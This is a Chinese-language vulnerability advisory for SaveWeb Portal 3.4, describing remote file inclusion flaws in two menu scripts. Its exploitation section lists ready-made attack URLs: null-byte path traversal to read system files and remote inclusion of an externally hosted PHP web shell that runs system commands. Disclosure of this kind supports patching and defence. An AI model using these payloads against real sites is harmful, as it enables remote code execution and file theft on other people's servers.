添加时间:
2005-08-31

系统编号:
WAVDB-00653
BUGTRAQ: 14641

影响版本:
SaveWebPortal 3.4

程序介绍:

SaveWeb Portal是用PHP开发的开源站点程序。

漏洞分析:

SaveWeb Portal中存在多个远程文件包含漏洞，远程攻击者可以利用这个漏洞在目标系统上执行任意服务器端脚本。
起因是没有正确的过滤用户输入。

漏洞利用:

http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00
http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00
http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00

在这里cmd.gif是类似于以下的文件：

<?php system('[some command]'); ?>

解决方案:
厂商补丁：
circeOS
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.circeos.it/


信息来源:
<*来源：rgod （rgod@autistici.org）
    链接：http://rgod.altervista.org/save_ ... avewebportal34.html
 *>